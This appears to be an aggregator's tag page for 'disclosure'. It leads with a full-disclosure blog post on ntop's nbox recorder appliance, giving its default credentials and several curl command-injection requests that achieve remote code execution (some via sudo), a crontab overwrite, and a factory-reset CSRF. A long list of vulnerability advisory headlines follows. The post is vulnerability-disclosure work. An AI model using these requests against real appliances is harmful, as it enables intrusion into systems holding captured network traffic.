< Back to JetLib.com

disclosure

« Expand/Collapse

1280 items tagged "disclosure"

Skip to page: 1 2 3 ... 6

August 01, 2016
9:21
Got any RCEs?
» ‎ Carnal0wnage

Security is a boomin’, and so there are many different appliances to protect your network. Some of them do very little to protect, some of them open new holes in your network.

In line with best practice, many Security teams capture all network traffic using a variety of solutions, some closed, some open source. Once the traffic is stored, it can be used to detect badness, or just examine traffic patterns on corporate assets.

One of these open source options is NTOP, which of course has an appliance version, called nbox recorder. It goes without saying, if this traffic data were to be exposed, the consequences could be catastrophic. Consider stored credentials, authentication data, PII, internal data leakage...
PCAP or it didn't happen

You can either buy a ready-to-go appliance or with some drudge work you can build your own. Just get a license for nbox and just put it into a Linux box, they are nice like that providing all the repositories and the steps are simple and easy to follow. Just spin up an Ubuntu VM and run:

wget http://apt.ntop.org/14.04/all/apt-ntop.debsudo dpkg -i apt-ntop.deb
sudo apt-get clean all
sudo apt-get update
sudo apt-get install -y pfring nprobe ntopng ntopng-data n2disk cento nbox

BOOM! You are ready to go. Now you have a nbox recorder ready to be used. And abused!
The default credentials are nbox/nbox and it does use Basic Auth to be accessed.

Before I continue, imagine that you have this machine capturing all the traffic of your network. Listening to all your corporate communications or production traffic and storing them on disk. How bad would it be if an attacker gets full access to it? Take a minute to think about it.

Uh-oh...
This level of exposure caught my eye, and I wanted to verify that having one of these sitting in your network does not make you more exposed. Unfortunately, I found several issues that could have been catastrophic with a malicious intent.

I do believe in the responsible disclosure process, however after repeatedly notifying both ntop and MITRE, these issues were not given high priority nor visibility. The following table details the timeline around my disclosure communications:

Disclosure Timeline

12/27/2014 - Sent to ntop details about some nbox vulnerabilities discovered in version 2.0
01/15/2015 - Asked ntop for an update about the vulnerabilities sent
01/16/2015 - Requested by ntop the details again, stating they may have been fixed
01/18/2015 - Sent for a second time the vulnerabilities details. Mentioned to request CVEs
05/24/2015 - Asked ntop for an update about the vulnerabilities sent and to request CVEs
01/06/2016 - Noticed new nbox version is out (2.3) and found more vulnerabilities. Old vulnerabilities are fixed. Sent ntop an email about new issues and to request CVEs
01/06/2016 - Quick answer ignoring my request for CVEs and just asking for vulnerabilities details.
01/28/2016 - Sent request for CVEs to MITRE, submitting a full report with all the issues and steps to reproduce.
02/17/2016 - Asked MITRE for an update on the issues submitted.
02/17/2016 - Reply from MITRE: “Your request is outside the scope of CVE's published priorities. As such, it will not be assigned a CVE-ID by MITRE or another CVE CNA at this time.”

07/10/2016 - Noticed new nbox version (2.5) with partial fixes for some vulnerabilities in the previous (2.3) version

The ntop team initially refused to comment and silently fixed the bugs. MITRE then said this wasn't severe enough to warrant a CVE. As such, I have now chosen to highlight the issues here in an effort to have them remediated. I again want to highlight that I take this process very seriously, but after consulting with multiple other individuals, I feel that both the ntop team and MITRE have left me no other responsible options.
Here comes the paintrain!

*Replace NTOP-BOX with the IP address of your appliance (presuming that you already logged in). Note that most of the RCEs are wrapped in sudo so it makes the pwnage much more interesting:

RCE: POST against https://NTOP-BOX/ntop-bin/write_conf_users.cgi with parameter cmd=touch /tmp/HACK

curl -sk --user nbox:nbox --data 'cmd=touch /tmp/HACK' 'https://NTOP-BOX/ntop-bin/write_conf_users.cgi'

RCE: POST against https://NTOP-BOX/ntop-bin/rrd_net_graph.cgi with parameters interface=;touch /tmp/HACK;

curl -sk --user nbox:nbox --data 'interface=;touch /tmp/HACK;' 'https://NTOP-BOX/ntop-bin/rrd_net_graph.cgi'

RCE (Wrapped in sudo): GET https://NTOP-BOX/ntop-bin/pcap_upload.cgi?dir=|touch%20/tmp/HACK&pcap=pcap

curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/pcap_upload.cgi?dir=|touch%20/tmp/HACK&pcap=pcap'

RCE (Wrapped in sudo): GET https://NTOP-BOX/ntop-bin/sudowrapper.cgi?script=adm_storage_info.cgi&params=P%22|whoami%3E%20%22/tmp/HACK%22|echo%20%22

curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/sudowrapper.cgi?script=adm_storage_info.cgi&params=P%22|whoami%3E%20%22/tmp/HACK%22|echo%20%22'

RCE: POST against https://NTOP-BOX/ntop-bin/do_mergecap.cgi with parameters opt=Merge&base_dir=/tmp&out_dir=/tmp/DOESNTEXIST;touch /tmp/HACK;exit%200
curl -sk --user nbox:nbox --data 'opt=Merge&base_dir=/tmp&out_dir=/tmp/DOESNTEXIST;touch /tmp/HACK;exit 0' 'https://NTOP-BOX/ntop-bin/do_mergecap.cgi'
There are some other interesting things, for example, it was possible to have a persistent XSS by rewriting crontab with a XSS payload on it, but they fixed it in 2.5. However the crontab overwrite (Wrapped in sudo) is still possible:
GET https://NTOP-BOX/ntop-bin/do_crontab.cgi?act_cron=COMMANDS%20TO%20GO%20IN%20CRON
curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/do_crontab.cgi?act_cron=COMMANDS%20TO%20GO%20IN%20CRON'
The last one is a CSRF that leaves the machine fried, by resetting the machine completely:GET https://NTOP-BOX/ntop-bin/do_factory_reset.cgi
curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/do_factory_reset.cgi'

To make things easier, I created a Vagrantfile with provisioning so you can have your own nbox appliance and test my findings or give it a shot. There is more stuff to be found, trust me :)
https://github.com/javuto/nbox-pwnage

And you can run the checker.sh to check for all the above attacks. Pull requests are welcome if you find more!

(The issues were found originally in nbox 2.3 and confirmed in nbox 2.5)
Modules for metasploit and BeEF will come soon. I hope this time the issues are not just silently patched...
If you have any questions or feedback, hit me up in twitter (@javutin)!

Have a nice day!

Tags: full disclosure

January 04, 2013
0:00
Vuln: WordPress Cimy User Manager Plugin Arbitrary File Disclosure Vulnerability
» ‎ SecurityFocus Vulnerabilities

WordPress Cimy User Manager Plugin Arbitrary File Disclosure Vulnerability
Tags: wordpress cimy user vulnerability disclosure user-manager

January 03, 2013
3:23
Simple Machines Forum 2.0.3 Path Disclosure
» ‎ Packet Storm Security Exploits

Simple Machines Forum versions 2.0.3 and below suffer from a path disclosure vulnerability.
Tags: path forum simple simple-machines vulnerability disclosure

3:23
Simple Machines Forum 2.0.3 Path Disclosure
» ‎ Packet Storm Security Recent Files

Simple Machines Forum versions 2.0.3 and below suffer from a path disclosure vulnerability.
Tags: path forum simple simple-machines vulnerability disclosure

3:23
Simple Machines Forum 2.0.3 Path Disclosure
» ‎ Packet Storm Security Misc. Files

Simple Machines Forum versions 2.0.3 and below suffer from a path disclosure vulnerability.
Tags: path forum simple simple-machines vulnerability disclosure

January 02, 2013
15:03
osTicket 1.7 DPR3 XSS / Disclosure / Redirect / SQL Injection
» ‎ Packet Storm Security Exploits

osTicket version 1.7 DPR3 suffers from cross site scripting, path disclosure, open redirection, and remote blind SQL injection vulnerabilities.
Tags: osticket disclosure dpr redirection

15:03
osTicket 1.7 DPR3 XSS / Disclosure / Redirect / SQL Injection
» ‎ Packet Storm Security Recent Files

osTicket version 1.7 DPR3 suffers from cross site scripting, path disclosure, open redirection, and remote blind SQL injection vulnerabilities.
Tags: osticket disclosure dpr redirection

15:03
osTicket 1.7 DPR3 XSS / Disclosure / Redirect / SQL Injection
» ‎ Packet Storm Security Misc. Files

osTicket version 1.7 DPR3 suffers from cross site scripting, path disclosure, open redirection, and remote blind SQL injection vulnerabilities.
Tags: osticket disclosure dpr redirection

15:01
osTicket 1.7 RC2 CSRF / Disclosure / XSS / Redirect
» ‎ Packet Storm Security Exploits

osTicket version 1.7 RC2 suffers from cross site request forgery, cross site scripting, path disclosure, and open redirection vulnerabilities.
Tags: cross osticket disclosure cross-site-scripting forgery redirection

15:01
osTicket 1.7 RC2 CSRF / Disclosure / XSS / Redirect
» ‎ Packet Storm Security Recent Files

osTicket version 1.7 RC2 suffers from cross site request forgery, cross site scripting, path disclosure, and open redirection vulnerabilities.
Tags: cross osticket disclosure cross-site-scripting forgery redirection

15:01
osTicket 1.7 RC2 CSRF / Disclosure / XSS / Redirect
» ‎ Packet Storm Security Misc. Files

osTicket version 1.7 RC2 suffers from cross site request forgery, cross site scripting, path disclosure, and open redirection vulnerabilities.
Tags: cross osticket disclosure cross-site-scripting forgery redirection

2:22
Drupal 6.x / 7.18 Information Disclosure
» ‎ Packet Storm Security Recent Files

Drupal versions 6.x through 7.18 suffer from getimagesize() path and information disclosure vulnerabilities.
Tags: disclosure drupal information information-disclosure

2:22
Drupal 6.x / 7.18 Information Disclosure
» ‎ Packet Storm Security Misc. Files

Drupal versions 6.x through 7.18 suffer from getimagesize() path and information disclosure vulnerabilities.
Tags: disclosure drupal information information-disclosure

December 30, 2012
6:44
WordPress RocketTheme Content Spoofing / Cross Site Scripting
» ‎ Packet Storm Security Exploits

33 new themes for WordPress that are made by RocketTheme suffer from cross site scripting, path disclosure, and content spoofing vulnerabilities.
Tags: content wordpress rockettheme disclosure
6:44
WordPress RocketTheme Content Spoofing / Cross Site Scripting
» ‎ Packet Storm Security Exploits

33 new themes for WordPress that are made by RocketTheme suffer from cross site scripting, path disclosure, and content spoofing vulnerabilities.
Tags: content wordpress rockettheme disclosure

6:44
WordPress RocketTheme Content Spoofing / Cross Site Scripting
» ‎ Packet Storm Security Recent Files

33 new themes for WordPress that are made by RocketTheme suffer from cross site scripting, path disclosure, and content spoofing vulnerabilities.
Tags: content wordpress rockettheme disclosure
6:44
WordPress RocketTheme Content Spoofing / Cross Site Scripting
» ‎ Packet Storm Security Recent Files

33 new themes for WordPress that are made by RocketTheme suffer from cross site scripting, path disclosure, and content spoofing vulnerabilities.
Tags: content wordpress rockettheme disclosure

6:44
WordPress RocketTheme Content Spoofing / Cross Site Scripting
» ‎ Packet Storm Security Misc. Files

33 new themes for WordPress that are made by RocketTheme suffer from cross site scripting, path disclosure, and content spoofing vulnerabilities.
Tags: content wordpress rockettheme disclosure
6:44
WordPress RocketTheme Content Spoofing / Cross Site Scripting
» ‎ Packet Storm Security Misc. Files

33 new themes for WordPress that are made by RocketTheme suffer from cross site scripting, path disclosure, and content spoofing vulnerabilities.
Tags: content wordpress rockettheme disclosure

4:10
[web applications] - Wordpress plugins sitepress-multilingual-cms Full Path Disclosure
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - Wordpress plugins sitepress-multilingual-cms Full Path Disclosure
Tags: wordpress web full web-applications disclosure cms

December 25, 2012
0:00
Vuln: PHP 'php-cgi' Information Disclosure Vulnerability
» ‎ SecurityFocus Vulnerabilities

PHP 'php-cgi' Information Disclosure Vulnerability
Tags: disclosure php information information-disclosure-vulnerability
0:00
Vuln: Rugged Operating System Private Key Disclosure Vulnerability
» ‎ SecurityFocus Vulnerabilities

Rugged Operating System Private Key Disclosure Vulnerability
Tags: rugged system operating vulnerability disclosure operating-system

December 24, 2012
14:59
WordPress Rokbox Themes Content Spoofing / XSS
» ‎ Packet Storm Security Exploits

Multiple WordPress themes by RocketTheme suffer from cross site scripting, path disclosure, and content spoofing vulnerabilities.
Tags: content wordpress rokbox wordpress-themes disclosure

14:59
WordPress Rokbox Themes Content Spoofing / XSS
» ‎ Packet Storm Security Recent Files

Multiple WordPress themes by RocketTheme suffer from cross site scripting, path disclosure, and content spoofing vulnerabilities.
Tags: content wordpress rokbox wordpress-themes disclosure

14:59
WordPress Rokbox Themes Content Spoofing / XSS
» ‎ Packet Storm Security Misc. Files

Multiple WordPress themes by RocketTheme suffer from cross site scripting, path disclosure, and content spoofing vulnerabilities.
Tags: content wordpress rokbox wordpress-themes disclosure

December 20, 2012
16:30
[web applications] - Wordpress plugin - sintic_gallery Path Disclosure Vulnerability
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - Wordpress plugin - sintic_gallery Path Disclosure Vulnerability
Tags: plugin wordpress web web-applications vulnerability disclosure
December 19, 2012
11:07
[web applications] - MyBB 1.6.9 full path disclosure
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - MyBB 1.6.9 full path disclosure
Tags: mybb web path web-applications disclosure
December 15, 2012
11:04
[web applications] - Wordpress Plugins - wp superb Slideshow Full Path Disclosure
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - Wordpress Plugins - wp superb Slideshow Full Path Disclosure
Tags: wordpress web plugins web-applications disclosure
December 14, 2012
13:57
[web applications] - WHMCS 5.1.3 Full Path Disclosure vulnerabilities
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - WHMCS 5.1.3 Full Path Disclosure vulnerabilities
Tags: whmcs web full web-applications disclosure

9:22
D-Link DCS-9xx Password Disclosure
» ‎ Packet Storm Security Advisories

D-Link DCS-9xx series IP cameras suffer from a password disclosure vulnerability.
Tags: d-link disclosure password password-disclosure vulnerability cameras

9:22
D-Link DCS-9xx Password Disclosure
» ‎ Packet Storm Security Recent Files

D-Link DCS-9xx series IP cameras suffer from a password disclosure vulnerability.
Tags: d-link disclosure password password-disclosure vulnerability cameras

9:22
D-Link DCS-9xx Password Disclosure
» ‎ Packet Storm Security Misc. Files

D-Link DCS-9xx series IP cameras suffer from a password disclosure vulnerability.
Tags: d-link disclosure password password-disclosure vulnerability cameras

December 13, 2012
3:17
[web applications] - vBulletin 5 Multiple Full Path Disclosure vulnerabilities
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - vBulletin 5 Multiple Full Path Disclosure vulnerabilities
Tags: multiple web vbulletin web-applications disclosure

0:00
Vuln: PHP 'php-cgi' Information Disclosure Vulnerability
» ‎ SecurityFocus Vulnerabilities

PHP 'php-cgi' Information Disclosure Vulnerability
Tags: disclosure php information information-disclosure-vulnerability

December 12, 2012
1:22
[web applications] - WordPress 3.5 multiple path disclosure vulnerabilities
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - WordPress 3.5 multiple path disclosure vulnerabilities
Tags: web path wordpress web-applications disclosure
1:21
[remote exploits] - Snare Agent Linux Password Disclosure / CSRF Vulnerabilities
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[remote exploits] - Snare Agent Linux Password Disclosure / CSRF Vulnerabilities
Tags: exploit remote snare exploits disclosure

December 11, 2012
11:00
Bugtraq: Information disclosure (mouse tracking) vulnerability in Microsoft Internet Explorer versions 6-10
» ‎ SecurityFocus Vulnerabilities

Information disclosure (mouse tracking) vulnerability in Microsoft Internet Explorer versions 6-10
Tags: disclosure mouse information internet-explorer-versions information-disclosure vulnerability

December 09, 2012
15:22
Cisco DPC2420 Cross Site Scripting / File Disclosure
» ‎ Packet Storm Security Exploits

Cisco DPC2420 suffers from cross site scripting, basic auth, and file disclosure vulnerabilities.
Tags: disclosure cross site cisco-dpc cisco

15:22
Cisco DPC2420 Cross Site Scripting / File Disclosure
» ‎ Packet Storm Security Recent Files

Cisco DPC2420 suffers from cross site scripting, basic auth, and file disclosure vulnerabilities.
Tags: disclosure cross site cisco-dpc cisco

15:22
Cisco DPC2420 Cross Site Scripting / File Disclosure
» ‎ Packet Storm Security Misc. Files

Cisco DPC2420 suffers from cross site scripting, basic auth, and file disclosure vulnerabilities.
Tags: disclosure cross site cisco-dpc cisco

December 07, 2012
1:22
[web applications] - IPBoard 3.x.x/3.4 Full Path Disclosure
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - IPBoard 3.x.x/3.4 Full Path Disclosure
Tags: web full ipboard web-applications disclosure
December 06, 2012
0:39
[web applications] - vBulletin 4.x/5.x multiple Full Puth Disclosure Vulnerability
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - vBulletin 4.x/5.x multiple Full Puth Disclosure Vulnerability
Tags: web full vbulletin web-applications vulnerability disclosure

December 05, 2012
16:00
WordPress eShop Magic Plugin 'File' Parameter Arbitrary File Disclosure Vulnerability
» ‎ SecuriTeam

The eShop Magic plugin for WordPress is prone to an arbitrary-file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
Tags: eshop magic wordpress vulnerability disclosure
16:00
airVision NVR Arbitrary File Disclosure and SQL Injection Vulnerabilities
» ‎ SecuriTeam

airVision NVR is prone to a file-disclosure vulnerability and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Tags: nvr vulnerability airvision disclosure

14:42
[web applications] - Moodle 1.9.14.2 Full Puth Disclosure Vulnerability
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - Moodle 1.9.14.2 Full Puth Disclosure Vulnerability
Tags: moodle web full web-applications vulnerability disclosure
14:39
[web applications] - Wordpress 3.4.2 JetPack Full Path Disclosure
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - Wordpress 3.4.2 JetPack Full Path Disclosure
Tags: jetpack wordpress web web-applications disclosure
14:36
[web applications] - OpenCart v. 1.5.1.3 Full Path Disclosure Multiple
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - OpenCart v. 1.5.1.3 Full Path Disclosure Multiple
Tags: web full opencart web-applications disclosure
10:29
[web applications] - Wordpress Plugins - my-link-order Full Path Disclosure Vulnerability
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - Wordpress Plugins - my-link-order Full Path Disclosure Vulnerability
Tags: wordpress web plugins web-applications vulnerability disclosure
December 03, 2012
13:24
[web applications] - Wordpress 3.4.2 Full Path Disclosure Vulnerability
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - Wordpress 3.4.2 Full Path Disclosure Vulnerability
Tags: wordpress web full web-applications vulnerability disclosure
13:21
[web applications] - Newscoop 4.0.2 Blind SQLi & Path Disclosure Vulnerabilities
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - Newscoop 4.0.2 Blind SQLi & Path Disclosure Vulnerabilities
Tags: web blind newscoop web-applications disclosure amp
13:03
[web applications] - vBulletin 4.2.0 Full Path Disclosure Vulnerability
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - vBulletin 4.2.0 Full Path Disclosure Vulnerability
Tags: web full vbulletin web-applications vulnerability disclosure

12:22
Newscoop 4.0.2 Path Disclosure / SQL Injection
» ‎ Packet Storm Security Exploits

Newscoop version 4.0.2 suffers from path disclosure and remote blind SQL injection vulnerabilities. Note that this finding houses site-specific data.
Tags: path disclosure newscoop

12:22
Newscoop 4.0.2 Path Disclosure / SQL Injection
» ‎ Packet Storm Security Recent Files

Newscoop version 4.0.2 suffers from path disclosure and remote blind SQL injection vulnerabilities. Note that this finding houses site-specific data.
Tags: path disclosure newscoop

12:22
Newscoop 4.0.2 Path Disclosure / SQL Injection
» ‎ Packet Storm Security Misc. Files

Newscoop version 4.0.2 suffers from path disclosure and remote blind SQL injection vulnerabilities. Note that this finding houses site-specific data.
Tags: path disclosure newscoop

November 30, 2012
9:05
Apple Security Advisory 2012-11-29-1
» ‎ Packet Storm Security Advisories

Apple Security Advisory 2012-11-29-1 - Apple TV 5.1.1 is now available and addresses information disclosure and code execution vulnerabilities.
Tags: advisory disclosure information apple-security apple-tv code-execution information-disclosure

9:05
Apple Security Advisory 2012-11-29-1
» ‎ Packet Storm Security Recent Files

Apple Security Advisory 2012-11-29-1 - Apple TV 5.1.1 is now available and addresses information disclosure and code execution vulnerabilities.
Tags: advisory disclosure information apple-security apple-tv code-execution information-disclosure

9:05
Apple Security Advisory 2012-11-29-1
» ‎ Packet Storm Security Misc. Files

Apple Security Advisory 2012-11-29-1 - Apple TV 5.1.1 is now available and addresses information disclosure and code execution vulnerabilities.
Tags: advisory disclosure information apple-security apple-tv code-execution information-disclosure

0:00
Vuln: Wireshark Information Disclosure and Denial of Service Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

Wireshark Information Disclosure and Denial of Service Vulnerabilities
Tags: disclosure wireshark information information-disclosure denial-of-service

November 29, 2012
12:22
Drupal Services 6.x / 7.x Information Disclosure
» ‎ Packet Storm Security Advisories

Drupal Services versions 6.x and 7.x suffer from an information disclosure vulnerability.
Tags: disclosure drupal information information-disclosure-vulnerability

12:22
Drupal Services 6.x / 7.x Information Disclosure
» ‎ Packet Storm Security Recent Files

Drupal Services versions 6.x and 7.x suffer from an information disclosure vulnerability.
Tags: disclosure drupal information information-disclosure-vulnerability

12:22
Drupal Services 6.x / 7.x Information Disclosure
» ‎ Packet Storm Security Misc. Files

Drupal Services versions 6.x and 7.x suffer from an information disclosure vulnerability.
Tags: disclosure drupal information information-disclosure-vulnerability

November 26, 2012
22:21
BugTracker.Net 3.5.8 XSS / SQL Injection / File Disclosure
» ‎ Packet Storm Security Advisories

BugTracker.Net versions 3.5.8 and below suffer from cross site scripting, file disclosure, and remote SQL injection vulnerabilities.
Tags: injection bugtracker sql disclosure

22:21
BugTracker.Net 3.5.8 XSS / SQL Injection / File Disclosure
» ‎ Packet Storm Security Recent Files

BugTracker.Net versions 3.5.8 and below suffer from cross site scripting, file disclosure, and remote SQL injection vulnerabilities.
Tags: injection bugtracker sql disclosure

22:21
BugTracker.Net 3.5.8 XSS / SQL Injection / File Disclosure
» ‎ Packet Storm Security Misc. Files

BugTracker.Net versions 3.5.8 and below suffer from cross site scripting, file disclosure, and remote SQL injection vulnerabilities.
Tags: injection bugtracker sql disclosure

November 23, 2012
9:12
Greenstone XSS / Password Disclosure / Log Forging
» ‎ Packet Storm Security Exploits

Greenstone Digital Library Software suffers from cross site scripting, password file disclosure, broken salt, and log forging vulnerabilities.
Tags: disclosure greenstone password digital-library-software password-disclosure

9:12
Greenstone XSS / Password Disclosure / Log Forging
» ‎ Packet Storm Security Recent Files

Greenstone Digital Library Software suffers from cross site scripting, password file disclosure, broken salt, and log forging vulnerabilities.
Tags: disclosure greenstone password digital-library-software password-disclosure

9:12
Greenstone XSS / Password Disclosure / Log Forging
» ‎ Packet Storm Security Misc. Files

Greenstone Digital Library Software suffers from cross site scripting, password file disclosure, broken salt, and log forging vulnerabilities.
Tags: disclosure greenstone password digital-library-software password-disclosure

0:00
Vuln: Drupal Mandrill Module Information Disclosure Vulnerability
» ‎ SecurityFocus Vulnerabilities

Drupal Mandrill Module Information Disclosure Vulnerability
Tags: disclosure drupal information mandrill-module information-disclosure-vulnerability mandrill

November 20, 2012
1:22
MODx 1.0.6 Brute Force / Path Disclosure
» ‎ Packet Storm Security Advisories

MODx versions 1.0.6 and below suffer from brute force and path disclosure vulnerabilities.
Tags: path modx force brute-force disclosure

1:22
MODx 1.0.6 Brute Force / Path Disclosure
» ‎ Packet Storm Security Recent Files

MODx versions 1.0.6 and below suffer from brute force and path disclosure vulnerabilities.
Tags: path modx force brute-force disclosure

1:22
MODx 1.0.6 Brute Force / Path Disclosure
» ‎ Packet Storm Security Misc. Files

MODx versions 1.0.6 and below suffer from brute force and path disclosure vulnerabilities.
Tags: path modx force brute-force disclosure

1:07
[web applications] - Omni-Secure 5 / 6 / 7 Remote File Disclosure
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - Omni-Secure 5 / 6 / 7 Remote File Disclosure
Tags: secure web application web-applications omni disclosure

November 19, 2012
13:38
Omni-Secure 5 / 6 / 7 Remote File Disclosure
» ‎ Packet Storm Security Exploits

Omni-Secure versions 5, 6, and 7 suffer from a remote file disclosure vulnerability.
Tags: secure disclosure file omni vulnerability

13:38
Omni-Secure 5 / 6 / 7 Remote File Disclosure
» ‎ Packet Storm Security Recent Files

Omni-Secure versions 5, 6, and 7 suffer from a remote file disclosure vulnerability.
Tags: secure disclosure file omni vulnerability

13:38
Omni-Secure 5 / 6 / 7 Remote File Disclosure
» ‎ Packet Storm Security Misc. Files

Omni-Secure versions 5, 6, and 7 suffer from a remote file disclosure vulnerability.
Tags: secure disclosure file omni vulnerability

November 15, 2012
23:25
BugTracker.Net SQL Injection / XSS / File Disclosure
» ‎ Packet Storm Security Exploits

BugTracker.Net versions 3.5.8 and below suffer from remote SQL Injection, cross site scripting, and file disclosure vulnerabilities. Full report and advisory included.
Tags: injection bugtracker sql cross-site-scripting sql-injection disclosure

23:25
BugTracker.Net SQL Injection / XSS / File Disclosure
» ‎ Packet Storm Security Recent Files

BugTracker.Net versions 3.5.8 and below suffer from remote SQL Injection, cross site scripting, and file disclosure vulnerabilities. Full report and advisory included.
Tags: injection bugtracker sql cross-site-scripting sql-injection disclosure

23:25
BugTracker.Net SQL Injection / XSS / File Disclosure
» ‎ Packet Storm Security Misc. Files

BugTracker.Net versions 3.5.8 and below suffer from remote SQL Injection, cross site scripting, and file disclosure vulnerabilities. Full report and advisory included.
Tags: injection bugtracker sql cross-site-scripting sql-injection disclosure

November 13, 2012
12:41
[web applications] - Baar3 Database Disclosure Exploit
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - Baar3 Database Disclosure Exploit
Tags: exploit web application web-applications disclosure
November 03, 2012
1:41
[web applications] - CheckPoint / Sofaware Firewall XSS / CSRF / Redirection / Disclosure
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - CheckPoint / Sofaware Firewall XSS / CSRF / Redirection / Disclosure
Tags: checkpoint web sofaware web-applications disclosure firewall

November 02, 2012
16:22
DCForum Information Disclosure
» ‎ Packet Storm Security Exploits

DCForum web conference software leaves a file with user information including passwords in the document root.
Tags: disclosure dcforum information information-disclosure conference-software web-conference

16:22
DCForum Information Disclosure
» ‎ Packet Storm Security Recent Files

DCForum web conference software leaves a file with user information including passwords in the document root.
Tags: disclosure dcforum information information-disclosure conference-software web-conference

16:22
DCForum Information Disclosure
» ‎ Packet Storm Security Misc. Files

DCForum web conference software leaves a file with user information including passwords in the document root.
Tags: disclosure dcforum information information-disclosure conference-software web-conference

November 01, 2012
0:00
Vuln: Apple iOS 6.0.1 CVE-2012-3749 Information Disclosure Vulnerability
» ‎ SecurityFocus Vulnerabilities

Apple iOS 6.0.1 CVE-2012-3749 Information Disclosure Vulnerability
Tags: disclosure vulnerability information apple-ios information-disclosure-vulnerability apple

October 31, 2012
17:00
WordPress Cimy User Manager Plugin Arbitrary File Disclosure Vulnerability
» ‎ SecuriTeam

The Cimy User Manager Plugin for WordPress is prone to an arbitrary file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
Tags: wordpress cimy user manager-plugin vulnerability disclosure user-manager
October 30, 2012
17:00
eShop Magic Plugin 'File' Parameter Arbitrary File Disclosure Vulnerability
» ‎ SecuriTeam

The eShop Magic plugin for WordPress is prone to an arbitrary-file-disclosure vulnerability
Tags: eshop plugin magic vulnerability disclosure wordpress

0:00
Vuln: Dokuwiki 'index.php' Path Disclosure Vulnerability
» ‎ SecurityFocus Vulnerabilities

Dokuwiki 'index.php' Path Disclosure Vulnerability
Tags: php index dokuwiki vulnerability disclosure

October 26, 2012
2:22
VicBlog Path Disclosure / SQL Injection
» ‎ Packet Storm Security Exploits

VicBlog suffers from path disclosure and remote SQL injection vulnerabilities.
Tags: path disclosure vicblog
October 25, 2012
9:01
WordPress GRAND Flash Album Gallery SQL Injection / Disclosure / File Overwrite
» ‎ Packet Storm Security Exploits

WordPress GRAND Flash Album Gallery plugin versions 1.9.0 and 2.0.0 suffer from file disclosure, file overwrite, directory traversal, and remote SQL injection vulnerabilities.
Tags: wordpress flash grand directory-traversal disclosure

9:01
WordPress GRAND Flash Album Gallery SQL Injection / Disclosure / File Overwrite
» ‎ Packet Storm Security Recent Files

WordPress GRAND Flash Album Gallery plugin versions 1.9.0 and 2.0.0 suffer from file disclosure, file overwrite, directory traversal, and remote SQL injection vulnerabilities.
Tags: wordpress flash grand directory-traversal disclosure

9:01
WordPress GRAND Flash Album Gallery SQL Injection / Disclosure / File Overwrite
» ‎ Packet Storm Security Misc. Files

WordPress GRAND Flash Album Gallery plugin versions 1.9.0 and 2.0.0 suffer from file disclosure, file overwrite, directory traversal, and remote SQL injection vulnerabilities.
Tags: wordpress flash grand directory-traversal disclosure

October 24, 2012
19:22
Contao 2.11.6 Path Disclosure
» ‎ Packet Storm Security Exploits

Errors thrown from manipulated SQL queries in Contao version 2.11.6 leak full path disclosure information.
Tags: path disclosure contao queries

19:22
Contao 2.11.6 Path Disclosure
» ‎ Packet Storm Security Recent Files

Errors thrown from manipulated SQL queries in Contao version 2.11.6 leak full path disclosure information.
Tags: path disclosure contao queries

19:22
Contao 2.11.6 Path Disclosure
» ‎ Packet Storm Security Misc. Files

Errors thrown from manipulated SQL queries in Contao version 2.11.6 leak full path disclosure information.
Tags: path disclosure contao queries

17:00
Legrand and Bticino Information Disclosure Vulnerability
» ‎ SecuriTeam

Legrand-003598 and Bticino-F454 are prone to a remote information-disclosure.
Tags: disclosure vulnerability information information-disclosure-vulnerability legrand bticino

14:00
[web applications] - WordPress GRAND Flash Album Gallery SQL Injection / Disclosure / File Overwrite
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - WordPress GRAND Flash Album Gallery SQL Injection / Disclosure / File Overwrite
Tags: web wordpress grand web-applications disclosure album-gallery
14:00
[web applications] - Contao 2.11.6 Path Disclosure Vulnerability
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - Contao 2.11.6 Path Disclosure Vulnerability
Tags: path web contao web-applications vulnerability disclosure

October 18, 2012
7:47
Legrand-003598 / Bticino-F454 Credential Disclosure
» ‎ Packet Storm Security Exploits

Legrand-003598 / Bticino-F454 SCS web gateways both suffer from a remote credential disclosure vulnerability. Firmware 1.00.26 is affected.
Tags: disclosure credential legrand web-gateways bticino vulnerability

7:47
Legrand-003598 / Bticino-F454 Credential Disclosure
» ‎ Packet Storm Security Recent Files

Legrand-003598 / Bticino-F454 SCS web gateways both suffer from a remote credential disclosure vulnerability. Firmware 1.00.26 is affected.
Tags: disclosure credential legrand web-gateways bticino vulnerability

7:47
Legrand-003598 / Bticino-F454 Credential Disclosure
» ‎ Packet Storm Security Misc. Files

